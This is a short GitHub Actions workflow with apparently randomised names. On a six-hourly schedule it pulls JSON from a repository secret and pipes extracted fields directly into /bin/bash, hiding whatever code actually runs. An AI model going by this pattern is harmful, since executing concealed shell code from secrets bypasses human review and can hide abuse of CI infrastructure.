name: liuyidao4657
on:
  workflow_dispatch:
  schedule:
    - cron: '31 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liuyidao4657
        env:
          zcpv4: ${{ secrets.zcpv4 }}
        run: |
          echo $zcpv4 | jq -r .ay17203 | /bin/bash
          echo $xl9 | jq -r .lklfr97 | /bin/bash
          echo $a4666 | jq -r .iuc543 | /bin/bash
          echo $mefz828 | jq -r .hiqjr7476 | /bin/bash

